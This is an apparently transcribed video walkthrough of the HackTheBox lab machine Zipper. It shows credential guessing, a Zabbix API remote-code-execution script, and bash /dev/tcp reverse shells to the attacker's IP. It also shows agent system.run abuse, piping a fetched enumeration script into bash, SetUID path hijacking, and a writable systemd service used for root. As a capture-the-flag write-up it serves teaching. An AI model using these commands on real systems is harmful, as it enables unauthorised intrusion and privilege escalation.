What's going on YouTube? This is IppSec and we're doing Zipper from HackTheBox, which I really liked because it wasn't overly complex and it felt like an actual pen test. You gain a API only access into a program called Zabbix, which is an open source monitoring application. Essentially, you just install the Zabbix Agent on all your servers and then configure Zabbix through a web interface to poll those agents for things like system utilization, disk space, website response times, etc. So you have a central place to look at all that timing information and see when your environment's behaving abnormally. So if you see one server has high CPU utilization, you can try to fix it before it causes problems for the whole cluster and just be proactive. But like all IT applications or applications that support IT staff, such as Splunk, Nagios, Manage Engine, etc., if you shell one of those, you can gain shells in a lot of places. And this box really does show it because we gain a shell access to Zabbix through having API access. And then the agents actually allow the Zabbix server to execute code on them, so we can gain code execution on the agents also and just lateral movement all day. So let's just jump in and check what this box is about. As always, we're going to start with the NMAP, so -sc for default scripts, SV, enumerate versions, OA, output all formats, put in the NMAP directory and call it Zipper. And then the IP address, which is 10.10.10.108. This can take some time to run, so I've already ran it. Looking at the results, we can see just two ports are open. We have SSH listening on port 22 and HTTP listening on port 80. Since web servers are much more vulnerable than SSH, let's just try going over to a web browser and seeing what is there. So go to 10.10.10.108, and we just get the default Apache page. So I'm just going to try a few pages manually. So let's try like robots.txt. /dev/admin, and we don't get any responses. So I'm going to throw it over into GoBuster, and we're just going to try all the results we can. So GoBuster-u, HTTP 10.10.10.108-w for word list, user share, word list, GoBuster, directory list, 2.3 medium, and I'm going to specify 50 threads. While GoBuster runs, I'm going to take a look at these SSH banners to find out what version of Ubuntu we have. So I'm just going to copy this, Google Launchpad, and then the SSH version. And that's OpenSSH 7.6 P1. And we can see this is Ubuntu Bionic, which I believe is Ubuntu 18.4. So let's go and check that out with HTTP. So check this, go over to Launchpad, and just Google this one, and we're going to see this doesn't have a listing there. Go to the next result down, doesn't have a listing there, and does this one? There we go. It's also saying this version of Apache is probably Ubuntu Bionic. And if you didn't know that was like Ubuntu 18, we could just Google like Ubuntu codenames. And then this page should tell us what they all are. So once this loads, yep, 18.4 is Bionic Beaver. So let's go check if our GoBuster has finished. Hasn't finished yet, but it does show us a new page, /Zabbix. So I'm going to go over to Firefox, and we're going to check out what /Zabbix is. We get a login portal, and we see the copyright is 2018. It looks like it's a commercial company, so I'm just going to Google Zabbix default credentials. And we're going to see that username admin, password is Zabbix. So let's just try that and try admin Zabbix. And don't save this. And we'll try admin with a capital A. Never save. There we go. So we don't get logged in, but this does have a link that says sign in as guest. So I'm going to click this and we can see the Zabbix dashboard. And if this point, I would probably do research on exactly what Zabbix is, but I'm relatively familiar with it. It's a lot like Nagios, or some people call it Nagios. It's just a server monitoring platform. So you have the Zabbix dashboard, that is the controller. It has a bunch of agents running on various servers that run various commands and give you status. So that's essentially what Zabbix is in a nutshell. But at this point, if I didn't know what it is, I'd be going to Google or YouTube and trying to figure out exactly what this application does. So let's go and click on like latest data. I like seeing the details thing. If I click show details, filter, And we can see various things about it. So the host zipper has agent ping as a script, agent hostname, and the version of Zabbix Agent. And we can see the values ping says it's up, the hostname says it's zipper, and the version says 3.0.12. Then we have another host called Zabbix, and this one only has one check. It's Zapper's backup script. So at this point, we have 3 potential usernames, Zapper, Zabbix, and Zipper. So I'm just going to log out and try various credentials. You could try things like Hydra, but I generally try like the username as the password and password as well. So I just did zipper, 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 password. And the reason why I do these before I go to Hydra is just because you may lock it out. So we said zipper, zapper, and Zabbix. So I'll do zapper and zapper. And we get a different error message. GUI access is disabled. So let's just try Zabbix and Zabbix. And Zabbix and password. So we have something to go off of. It's the username is Zapper and the password is Zapper. Just says GUI access is disabled. So I'm going to go over and we can kill this Go Buster. And I'm going to try Searchsploit Zabbix. I'm going to look at things. So we have version, let's see, does this tell us what version we're running? I bet if we log in as guest, we can get the version. 3021. So looking at this, we can ignore any like Zabbix 1s because that's way too old. We have this SQL injection. It says 3.0.x. So I'm going to check what x is. So we do searchsploit-x, and we can view the script. We see it was fixed in 3.0.4, and we're like 3.0.21. So this SQL injection's not going to be good. And the other thing we have is this API JSON RPC remote code execution. It says 3.0.3, but let's just try this out anyways and see what's going on. So copy this, searchsploit-x, put the script in, and let's see, we have to edit the IP address, the root, we got login, so this is doing admin Zabbix, the default, this host ID thing, and this host ID, if we go back and log in as guest and go to like latest data, we can click on the host, do scripts and ping, and then this will tell us the host ID right here. So Zipper is host ID 10106, and Zabbix is going to be, let's see, host ID 10105. So we can see if we can run other scripts real quick. So let's copy this and just paste this in. Let's see. So let's try script ID 2. We can see that's doing a trace route. Script ID 3. We have no permissions or it doesn't exist. 4 doesn't exist. 5 doesn't exist. So it looks like the only scripts we have are ping and trace route. So I don't know what this backup script is. Just has item ID and we get access denied. But the key thing is to note the actual host ID, so 10105. So then we scroll down, we can see, let's see, it looks like this is probably going to do some type of authentication because the variable is called auth. And then we're doing update, and the method is script.update. Script ID is set to 1, and we're putting a command here. So what this is doing is going in and going for script ID 1 and changing the command that is ran. So the command here is ping, and we're going to be changing it to the variable CMD, which is, I'm guessing, what we set. So if you're doing this in production, this is where you got to think, oh, maybe I shouldn't use this script. Maybe I should create a new script to create a script in Zabbix and then change that one. Because right now we're going to be changing production data. If we change the ping script, who knows how many things are going to break. So just be cautious about things like that. And then right after we update it, we change it to execute. So we're saying script.execute, script ID 1. and then on the host ID. So let us do Searchsploit-M to mirror the script. And now let's edit the script. So the first thing we have to change is this Zabbix root. It's not going to be 192.168. This IP is 10.10.10.108. And we also have to specify the directory Zabbix. Then we have the login. It's not going to be admin. It's going to be Zapper. And it's not going to be Zabbix. It's going to be Zapper yet again. Now the host ID, this is going to be 101.05. And we got that just based upon this URL saying the host ID right here. Whoops. If we click here, click on ping, and we get host ID right here. So we do host ID as that, and I think that's all we're going to have to do. Whoops. So let's save this out. And at the end of the video, we'll go and create our own API script so you can see exactly how this works and get a better understanding. But for now, let's just test if this works. So we do Python 39937, and let's just try hostname. And we just get a bunch of weird stuff. That's odd. Let's do ifconfig, and we see the IP is not the one we expected. We expected to see 10.10.10.108. We got 172.17.02, so we're in some type of container. So the next thing I did was exit the script, go back and edit it, and let's try a different host ID. So we do host ID 10106, try to edit this, let's do hostname, and we get the same exact thing. So no difference between host ID, that just didn't do anything. And if we actually Google the Zabbix API, so Zabbix API, let's do documentation 3.0 because that's what we are on. Go to method reference, and if we look at script, where's script? Here, and look at the script object, we can see there is a execute on flag, and if it's 0, it runs on the Zabbix agent. If it's 1, it runs on the Zabbix server. So we want to update our script to make this run on the Zabbix agent. And additionally, just so we can see that we are changing things, if I click this and do ping, we got the output of the last command I ran. So this is why you generally don't do this in production, just because it does change things. So let us edit our script, and let's put a execute on. So let's change this, execute on, and then 0 runs it on the Zabbix agent. So run this again, do hostname, and now we are on Zipper. But this was kind of an unintended thing, so we'll back out of this and undo that change. I just wanted to show that, and we'll show going through it the intended way. So we're back on, let's change execute on to be 1. Now hostname, there we go. If you're wondering why something like that exists, it's because the web server itself that runs Zabbix, the monitoring application, you generally don't install the agent on itself. Instead, you just say, hey, web server, go execute it under your context. And that's why that happens, and they have those type of flags. So if the server wants to monitor itself, it can. And additionally, you don't always want to tell a agent to run something. Let's say I just want to check the HTTP response time of something. I don't want that to run on the Zabbix agent. I want that to run on the Zabbix web server because I want to simulate a remote connection instead of doing it all through localhost. So that's kind of why that flag exists. But anyways, we are on the Zabbix server, and we are running as, who am I? The Zabbix user. So if we cat etc passwd to look at other users, we don't see any. If we go into home, there is ls/home. Let's just get a persistent shell. So let's do netcat lvnp 9001 because it's got to be over 9001. Doesn't have to be, just fun. and then we'll do bash-c. And the reason why I do that is because we're probably in sh or dash. So if we just echo 1 to dev tcp 10.10.10 or 10.10.14.3, I think that's my IP, 9001, we get that directory doesn't exist. If we do it within bash, we will get it. So 10.10.14.3, 9001, and we get the connection. So that's why I always preface this with bash when I'm in these weird reverse shells that are probably not using the bash shell. So bash-c, bash, -i, directed and dev tcp 10.10.14.3, 9001, 0 and 1, like that. Then netcat again. Let's see. And we have a shell. So let us make this a better shell with Python. Python C, import pty, pty.spawn, bin bash. Python's not found. Python 3 is not found. So let us use script. So we'll do script -q. And before I do this, I'm hitting up, down, and we can see it's sending the control characters. So that's what I want to eliminate and actually get that functionality back. So script -q for quiet. The output file is going to be dev null. And now if I do Control Z to background it, stty raw -echo, fg, enter, we can see, oh, it's, I must have forgot to do something because normally that works. So let's exit. Stty raw -echo. Yeah, I'm not sure why that didn't work. So let's exit everything and redo this. So stty, nope, reset. Netcat. Run this. Create the shell. Okay. So let us find the credentials for my SQL. So to find the credentials for the SQL server, because Zabbix is using SQL, I'm just going to Google Zabbix change SQL password, and this will cough up where the config is. So how to change the Zabbix database password, we can see it is in etc zabbix zabbix-server.conf. So we can just cat this file and then look for password, and we can see the DB password is this, and we have the DB user as Zabbix and the DB name as ZabbixDB. So I'm just going to create a thing for notes, Zabbix, this, ZabbixDB, just so I have that somewhere, and we'll leave that open. So let us try suing with root, and we see su must be ran from a terminal, so that's where my script -q came from. And now I can do su, and it thinks it's a terminal, so we can just paste that password. And we see authentication failure, so that's not the password there. We could also do like MySQL-u Zabbix-D ZabbixDB-P under the password. Then we can do like show databases, use ZabbixDB, show tables, describe users, and we can select user ID, alias, passwd from users, and dump all the passwords. And this looks like maybe SHA-1 sum. Let's see how many characters this is. Echo-n, wc-c, 32. So that's just a MD5 sum. So we could try cracking that, but let us just cat the notes, and let's do the MD5 sum of this. So echo-n, MD5 sum, and we can see it's a match. So we know the admin user's password is the same as the SQL database. We knew what Zappers was, guessed this is probably like a blank MD5 hash or something. Let's do echo-n, nothing MD5 sum. Yeah, that's a blank MD5 sum. But if we wanted to, we could log in to the web interface as admin. And now we're a super user on Zabbix. We could go to like configuration or administration and users and see both Zapper and Zabbix are super admins. And this one, Zapper's just in the group that says no access to front end. So if we check configuration and go over to hosts, we can see that the Zabbix server is enabled and it doesn't have the Zabbix agent on it. And these are different ways to identify if a host is online. You got the Zabbix Agent, SNMP, JMX, this is like the Java Management Console, and IPMI. This would be for like ILOs and out-of-band management things. But on Zypper, we can see that ZBX, the Zabbix Agent, is installed. So let us Google Zabbix Agent port, and we can see it listens on 150 or 151. So let's see if any of those ports are open from within the Zabbix server. So if we do nc-zv, let's do up-a. Maybe I needed an. Probably should have done n to not do DNS. Let's control C. Python 3.9 nc up-an. We can see 172.17.0.1. So we have a different IP. We can try doing nc-zv 172.17.0.1 on port 150. And NC is not coming back. So let's try bash-c echo 1 dev tcp 172.17.0.1 150, and then if that's successful, echo open, else echo false, and we can see that port is open. If we did it on a port that did not exist, let's say port elite, we see false. It's not open. So we could do like 151, and we get false, that one's not open. So the Zabbix agent on 172.17.0.1 is listening on port 150. And again, the big clue I saw was just looking at the availability and seeing ZBX. So let us Google the Zabbix Agent API. So let's Google Zabbix Agent API. Let's see, 3.0. Maybe this will be it. I'm not sure a good way to get to this documentation I want. Unfortunately, hacking around applications is just really a lot of reading. So let's see. Let's do Zabbix Agent system.run, which is a command I know in it. And this is the page we want. So we want to go 3.0 manual config items, item types, Zabbix Agent. So Zabbix is very simple in how it works. So let's see. We got all these different commands. So let's see. What is one? We got agent.hostname. So if I do echo agent.hostname and send that to port 150, so 172.17.0.1, 150. Let's see what happens. We don't have to do this bash-c thing. Let's just clean that up. We got nothing. Well, it said ZBXD, which means it ran, but it didn't give us the thing I wanted. Transactional host name from a configuration file. We can try agent.ping. So agent.ping. Weird. Ping. Does it have to have this? There we go. I think I have to have those brackets. Host name. Nope. I swear I had this working before. Let's see. Are there other ones that we can do? net.dns, netif, netudp, procmem, procnum, boot time. Let's try system.boot time. Is this going to send us anything? So I'm going to say system.boot time. Is it 2 T's? It is. We just get and. I'm going to go into a shell again, and we're going to see if that does it. So nclvnp 9001 bash-c bash-i dev tcp 1010 14.3 9001 0 and 1. That should be good. And now let's try this again. See if this gives us a different response if it's not in that weird thing. Yeah, it does. So it's this weird shell that was throwing us off. We can see that ZBXD, and then it says zipper, which is the host name. So if we do echo agent.ping, we can see 1. So that's host is alive. We can try system boot time, see what this returns. Unsupported item key. So system.boot-time. Let's get rid of the brackets. NC 172.17.01 150. Unsupported item. So that one doesn't support boot time. But if we go all the way down, there is a system.run. And if the agent configuration file has enable rote commands equals 1, then this will run. So let's try that. So let's do echo system.run, and then it says put the command in brackets. So we'll do ping-c1. I think that's count. Ping. I think Windows and Linux are different there, and 1 is N, 1 is C. So Linux is -C, so 10.10 14.3, and then pipe that to NC 172.17.01 150. And I forgot to close off this quote. So try this, and we'll do TCP dump -I ton0 ICMP and enter, and we can see the pings going across. So we confirmed we have code execution. We can do netcat-h, and I want to look for the keep open, which is -k. So let's do netcat lv, let's do just lknp 9001, and then let's try a different thing. So let's try echo system run ls/nc 10.10 14.3 9001, and then close off the quote, pipe that to NC 172.17.01 150. So what we're doing is telling the system to run ls/ and send the results to 10.10 14.3 on port 9001, and then sending that to 172.17.01 port 150. And we can see we have the output of that command. So we could also just do the same thing, except do who am I, do the same exact thing. And we can see we are Zabbix. I should have did host name to show it says zipper. So let's just do that real quick. Host name. And paste this. And we can see the host name is zipper. But enough of doing all this. Let's get a shell. So let's do echo system run. So let's see. Do this, then bash-c. What is it? Bash-i. That dev tcp 10.10.14.3 9001 0 directed to 1 and that and that and then nc 172.17.01. Put the port, and that looks good. And there we go. We got a shell in the box, and then the shell dies when this dies. So that shell only lasts a few seconds. And the reason for that is we have the agent that is running this command, and by default, it only listens for waits like 3 seconds and says, okay, you were running longer than 3 seconds, I'm dying, and we're going to kill you. So we have to fork the process out of the agent. To do that, I'm going to use a command called nohup. So let's do the same thing. Oh, we lost a whole shell. That's unfortunate. Let's just do Python this. And let's do system run, copy this. So do nohup, then paste the shell, and then put a and at the end. And then we can just do it as normal. And that nohup is going to background our process. So now, if the agent died, we still have the shell. So now we're on the Zabbix host. And we can't clear. Let's echo export term is equal to, let's just do xterm. Will that work? And now we can clear. So the first step to do on this box would be probably LinEnum. So let's start a web server in this session. So let's go opt LinEnum, Python, m simple HTTP server. And then we can just curl 10.10.14.3, port 8000, linenum.sh, pipe that over to bash. And curl is not installed. Do we have nc on this one? We do. So I'm just going to do netcat linenum, netcat lvnp 8000 and direct linenum there. We can do netcat 10.10.14.3, port 8000, pipe that over to bash. And there we go. Now we have LinEnum running. This shouldn't take too long, and then we can just go over all the output and see where we want to begin with trying to do a PRIVESC. The key thing I want to know is exactly kind of like what container technology is this? Is this running Linux containers? Is it running Docker, QEMU? What is that 172.17 address actually running? So let's just go and start looking at this while it runs. So we have the kernel information, that's Ubuntu, that's not a big shock. Let's see, Ubuntu 18.04, so we are correct there. Hostname zipper, we have root previously logging into the system. Users, Zabbix, we don't really have any cool users. We have some admin users, Zapper is an admin, and we are the user Zabbix. So there is a different user. Etsy passwd, super user accounts, home directories. We have Zapper, and anyone can go into Zapper's directory. So we should take a look at that. Zabbix Agent, hidden files, word readable files in home. We have home Zapper utils backup.sh. So this is probably that backup script we saw in the Zabbix web interface. Shells, nothing interesting. Crons, nothing too interesting. We have system D timers, purge-backups.timer. We have networking IP. Docker is listening on 172.17.01, so it answered that question. And let's see. let's just go and look at exactly what that scan was. Not scan, utils directory. So if I kill the netcat on my host, yes, I get my shell back. Awesome. So let's go home, Zapper, and then let's go into that utils directory, and let's look at backup.sh, and we can see it's creating a zip file of the utils directory with the password of zippity doodah. So let's just try su to zapper with that password. Must be in a terminal. So let's see, do we have Python? Let's just do which Python. We can do which Python 3. And we can also do the script-q thing like we did last time. I just like doing the Python better. So import pty, pty.spawn, bin bash. And now we can do su zapper, paste the zippity doodah, and we are now the Zapper user. And we can do a wc-u on user.text, and or wc-c, and see it's 30 characters, which is an MD5 sum and a line break, so we can get that hash if we wanted and get credit. But going back in the utils directory, we have a SetUID binary. And first I'm going to do the unintended way, and then we'll do it the intended way. The unintended way, we could have done it as the zipper user. We didn't need to get Zapper, because if we do strings on Zabbix-Service, we can see, whoops, let's see. It's going to do start stop. We got a question here, and we got systemctl daemon reload systemctl start Zabbix Agent. So this is the key thing to pay attention to. This is passing a command somewhere. So let's just try running this. Actually, before we run that, one of the key things to do is go into the SSH directory and grab this private key. Because, as we're going to see, go to utils, and then if we run this Zabbix-Service, and we say stop, it's going to kill our shell. And the downside when it kills our shell is we don't have an easy way to get one back. So if we do this Python, let's go back. What was it? Let's do echo. What was it? System.run. We can paste this in. We want to listen on 9001. But we get connection refused on that Zabbix port. So if we didn't grab the key, stopping the agent just killed a way to PRIVESC up the stream. So let's go back up and grab this SSH key. So let's copy this, then do v zapper.pem, paste it, chmod 600, and then sh-i, zapper.pem, zapper at 10.10.10.108, and we're back in. So stopping it can be very bad. So if we do ltrace on this service to see exactly what it does, that wasn't the right file. ltrace on the Zabbix service. It's asking us to start or stop. Let's do start. And we can see it's doing a system command into systemctl. And the thing about SetUID binaries is they don't have a safe path. So if there was Pseudo, you could have it so you can't do path hijacking or whatever that's called. So since it's just calling systemctl, it's defaulting to the path and going to look at all these directories for systemctl one by one. So what we can do is let's make a directory. We already have that temp created, so let's just do temp systemctl and put bin bash and bash. And then chmod plus x temp systemctl. And if I do systemctl here, it's just going to run systemctl. If I export path is equal to, do I do equals here? I think. Path is equal to temp. I don't think so, actually. Yeah, I don't do equals. Export path, temp, path. I'm drawing such a mindfuck right now. Let's do echo path. Let's just path is equal to temp path, echo path, export path, systemctl. There we go. We can see we have changed a path. So when I did systemctl before my path had /temp at the beginning, it ran systemctl from wherever it existed. When I put temp at the beginning, it now ran systemctl, which was my bash script. So if I do /Zabbix-Service stop, we now, instead of running that systemctl to stop the service, it runs a bash script and we are root. So I can go into root, and then we can do wc cd/root, and then wc-c root.txt, and we can read that. The intended way would be looking at that purge service. So in that LinEnum, if I still have it in my history, LinEnum, purge, these purge backup timers. So if we look at this, so if we do find/etc grep for purge backups and look at exactly what this service is and do a ls-la on it, we can see that the Zapper user can write the service. So we can edit this, and we can change exec to be anything we wanted. So we could just comment this out and say exec start is equal to temp please subscribe.sh. And then if we create vtemp please subscribe.sh, we can like copy root.txt, or we'll actually just do chmod 4755 on vi. I think it's just in bin vi. Which vi user bin temp please subscribe user bin vi. So now if we figure a way to run that purge backup service, maybe just wait a bunch of time, or every time you do the starting and stopping the service, we do Zabbix-Service and then say start, we can do journal ctl-f and see a bit of the log. Let's do Zabbix-Service stop it, journal ctl. I could have sworn that would have showed it. Journal ctl. Maybe it's not. But anyways, if we look at vi now, so ls-la user bin vi, it did not work. And that may be because it's symlinked to etc alternatives vi. ls-la bin dash, does that exist? It does. So let's do vtemp please subscribe.sh. Just do this to bin dash. And then ls-la bin dash. Not there. If we stop the service. Oh. General CTL is not working because of my path. Gosh darn it. I think echo path. Yeah. So path is equal to, let's do this. Export path. And then / Zabbix-Service stop. There we go. Journal CTL-F. I don't know why it's not writing anything to systemd. I want to say if you do journal CTL-F, you will see it. Or maybe I just have the command wrong. But anyways, ls-la bin dash. Still not there. Zabbix-Service start. Zabbix-Service stop. Something has screwed up the system timer on that, I think. So this may be one you just have to try on your own and see if you get it working. I want to say something has screwed me over. We'll try one last thing. So copy this to make sure I don't have typos. I do not, but we don't have bin bash. And let's chmod plus x to make that executable. And then let's try this again. Stop. Start. ls-la bin dash. There we go. Now it's got the SetUID bit. So it's because it wasn't executable or it didn't have that bash header in. But now when I execute dash, it switches me over to... Oh, it looks like this version of dash drops SetUID bits. So you'll have to find a program that doesn't drop your SetUID bit for it to work. Sometimes dash does, sometimes dash doesn't. I guess on Ubuntu Bionic, dash is dropping that. But we have confirmed we did execute code. So if we wanted to, we could just, let's do, edit this. We could chmod 777 /root, and then chmod 777 root.txt, and then run the Zabbix thing, stop, start, and then if we do ls-la on / we can see root is chmod 777, so we can go in, and we can also grab root.txt. So that is the intended way to do it. So let's go and step back way far back and look at creating our own API script, because being able to read an API and then create a client is pretty awesome. So let's close out of everything and close out of this. And now we are back at root. So let's begin. And let's start creating our skeleton script, which will turn into our API client. So the first thing we want to do is do from cmd import cmd, because we're going to create a pseudo terminal. So when we do that, we create the class terminal cmd. We want the prompt to be just a simple caret. Then we need a function, so we'll call this do subscribe. And then we can do print, thank you for subscribing. And then we just got to create our object and start it. So terminal is equal to terminal, and then terminal.cmd loop. So if I do Python 3 on Zabbix, type subscribe, it says thank you for subscribing. So now we have to make this actually log into the API. So we'll do def do login self args, And I'm going to split my terminal, and let's see exactly how this script does it. So we have a payload, and it does JSON RPC, user login, auth none, 0. And I really hate writing this payload every time, so I'm going to create a function called def API call, and we do self args, and that's just going to simplify it. So we can always just call this one, and then we don't have to specify all of this every time. So this API call URL is equal to http 10.10.10.108 Zabbix API JSON RPC.php. Then the header, we want content type, and this is going to be application JSON. Okay. Then we want the payload is equal to, we want JSON RPC 2.0 method. This is going to just be a argument. Then params script ID. Oh, that's not login. We want up here. Okay. So for params, let's just do params because this can be anything. And then auth, we'll do the auth variable. ID is equal to ID. Okay. And instead of self args, let's give all these variables names. So we want to do self. The first one is method, then we have params, then we have auth, then we have ID. And I just went down the list here. Okay. So now we can do response is equal to, and we have to do import requests. Response is equal to request.post URL. Data is equal to json.dumps. Payload headers is equal to header. Okay. And then we want to return, and they're just doing auth.json here, but since we're in a function, I'm returning it like this. Okay. So now we can do our login. So we can do user password is equal to args.split. And then we got to create the params variable. So user is equal to user. Password is equal to password. Okay. And then we can just do API call, and then user.login, that is the method, then params none 0, and we're just going to call this auth, and we can print auth. So I'm going to print what this is. I think that's going to work. So we can do login zapper API underscore call is not defined. Let's do self.api call. Login zapper. JSON's not defined. We got to import JSON. Login zapper. And I probably typoed the URL since it's taking so long. So 10.10.10.108. I did not. Login zapper. Do I have to have a return? Login, Zapper, Zapper. Let's see. Is this not working? I think my VPN went down. Let's try reconnecting. Complete. Okay. Let's do this again. Login, Zapper, Zapper. There we go. So for some reason, my VPN was down, and that's why it was timing out. So we do have the auth result right here. So let's do print auth, and then, was it result? Try this. Login, Zapper, Zapper, and there we go. So what we want to do is just return this instead of printing it. And we're going to create a initialization for this. So I'm going to do def init, because we don't want to have to log in every time. So do that. Then we can do self.auth is equal to self.login, self.doLogin, Zapper, Zapper, and then do subscribe. We're going to print self.auth. So try this. Terminal object has no key, so we just have to call the init. So cmd init self. There we go. And if we type subscribe, we get the auth cookie. So we can control C this again, do subscribe, and we get a new cookie. So now our script is automatically logging in. So let's go and Google the Zabbix API. So we don't need this anymore. All we're doing now is straight Googling. So let's do Zabbix API, documentation 3.0. And the first thing we want to do is let's just list all the users. So let's go to method reference, go to user, and we can look at what we can do with users. So we got the user object, and we got all these functions. User.get. So let's check this one out. So this will be the method, is user.get, and then all these are parameters. So the get access is adds the following properties for each user, and this is a flag, so this can just be 0, 1, I guess. So let's try this. And is there any other one we want to do? Editable, sort field. No. So let's go back in our script. And 2, 3, 4, 5, 6, 7, 8. Let's do 8 yank. Put. And instead of do login, we're going to do get users. And we don't need any arguments. So the parameters, all we want to do is, let's try doing it with no parameters. So get params, and this, where we have none, that is auth. And I think we put a 1 here. I forget what that last one is, but let's just try this. Print. Let's do users, and then we can print users. Should be good. Get users. Auth not defined. Is that a self.auth. I always forget that in classes. Get users. Invalid params. The user.login method must be called without the auth parameter. I forgot to edit this. This is user.get is the method. So instead of user.login, user.get, get users, and now we finally start getting it. So we got admin, user ID 2, guest. This isn't really that pretty. So let's make this pretty. So I think it's import pretty print as pp, and then we can do pp.pprint users, and let's try this. Get users, and there we go. So now we got, let's count how many lines this is. So copy vtemp wc-l for lines. We got 15 lines. And the thing we wanted to do was the get access flag. So let's exit this. And let's do params get access 1. So now when we do this, get users, this looks like more things. vtemp, paste this in, wc-l temp, we got 18. So we got 3 new lines from the last one. And I should have just done something so I could diff them and we could see what we get. So let's go back up here, copy this, vtemp2, and then diff temp temp2. Oh, spacing and stuff makes it annoying. Cat temp temp2. Whoa. grep.temp2 said let's get rid of all spaces. Actually, it looks nice. Let's do that to temp1 too. Okay, diff temp temp2. So we can see debug mode, GUI access, and maybe user status is different. So, but if we cat temp2, cat temp temp, should be really obvious. So alias Zapper attempt. So yeah, user status, and then debug mode and GUI mode is different. So that's what that one thing did. Let's do something to get the groups. So let's do def do get groups, self args, and then let's yank 1, 2, 3, 4, 5 lines. Paste. Get rid of the params. Let's get rid of this. And let's go to groups. So user group. And let's do user group.get. So the very first thing, so I don't forget, let's do user group.get as the method name. And let's try calling it without any parameters and see what happens. Get groups. And we can see we have Zabbix administrators gas disabled, enable debug mode, and no access to the front end. So let's see what we could do. Let's see. Limit selects. Is there anything cool we could do with this? So we could say status. So return only groups with a given status. And we refer to this page for what status is. User status, 0 is enabled, 1 is disabled. So if we wanted to only get the groups that were enabled, we can just pass that as a flag. So 0 was enabled. So if we get groups, that disabled isn't there. So if we do this again, change status to 1, and we do get groups, we only get that disabled group. So let's do create a user. So let's go into users, and we can do user create. And we want to do, let's see, params, alias, passwd, user groups. If we do the user object, user object, we'll probably see all the things we can do. And we want to give a user the type as a super admin. So we want to make a call to user.create. So let's just yank this. I think that's 7 lines. Yank. Paste. Sweet. So we're actually going to use args. So the args will be user password is equal to args.split. And then params, we needed alias, that's required. So alias is going to be IppSec. Then we need the name. It's going to be IppSec. Passwd. It uses passwd, right? User ID. Let's do user create. Passwd is required. So passwd is going to be please subscribe. Oh, shoot. Alias, user, password, and name will be the same as the user. I forgot I created these as variables. Okay. We want to do type as 3. We'll leave type out of it and then do type next. So the next thing we wanted to do was user groups, and we want to do the admin. So user groups goes bracket, then JSON. So USR GOPS, like this, I think. Then USR GOP ID. That's an annoying way to say it. And we'll say 7. And that's probably it. We need to specify user create. And let's just do some house cleaning. Output. Okay. I don't know if that's actually going to work. And we don't want to do get users. We're going to do create user. And Python 3 create user IppSec please subscribe. Looks like it created it and returned IppSec is user ID 4. So if we go back to Zabbix, let's do new private window. 10.10.10.108 Zabbix IppSec please subscribe. IppSec please subscribe. And we get pretty much no information. We know what the admin portal looks like, and we are definitely in the admin group. If we go here, do administration, user groups, Zabbix administrators, we can see IppSec is a administrator. But if we go to his permissions, he's denied everything. If we go list all the users, we see IppSec, yes, is a Zabbix administrator, but he's still a user type of Zabbix user. So if I wanted to, we could either just create a new user, or we can change a user. So let's look at how to change a user real quick. Let's do 7. Let's try changing user. So make admin params. This will be user ID probably. It'll make it easier if we just do this. Put that there. Put this here. There we go. So now go here. Let's do user update. So user ID, and then we can specify what we want. So make admin user ID is equal to args. We'll do type. I think it was just type. Is this the user user object? Type 3. So type 3 user dot update. And it doesn't say we have to do user ID, so maybe we can do alias, and maybe we'll update this way. So run this, make admin IppSec, wrong fields for user IppSec. Let's try user ID. Make admin 4 and success. So let's see if we refresh this, or we can just log in again. IppSec, please subscribe. And now we can see we are definitely a super administrator. So if you want to go further on, I leave it up to you to add some stuff to the script. Maybe you should take that script update, script execute, and have this actually go in the API and go into a script and do script.create to create a new script, get the ID of that script, and then execute it. So that way when you're doing Zabbix API stuff, you're not overwriting whatever script ID 1 equals. Additionally, something you may want to do is make this make admin thing, make this do a get user and search for the user IppSec, pull the user ID, and then do this params and put it here. So in the make admin, you can specify usernames instead of having to specify the user ID, because it would be getting the user ID from the get users request, if that makes sense. You just do essentially get users, find IppSec, get his ID, and then do a make admin and pass the ID there. Yeah, so to show exactly how that one script works, let's see if I can find it, or how the code execution thing works. Administration scripts, we can look at ping, and we can see everything here. So we can see the type is a script, execute on Zabbix Agent. Here's the command. This is the last command we ran because we overwrote the ping. And then there should be, execute on Zabbix Agent or Zabbix Server. So that's where that one flag comes, and why we could just change to Zabbix Agent and have this execute on the zipper host. User group, permissions, whatnot. So yeah, that'll be the video. Hope you guys enjoyed it. Take care, and I will see you all next week.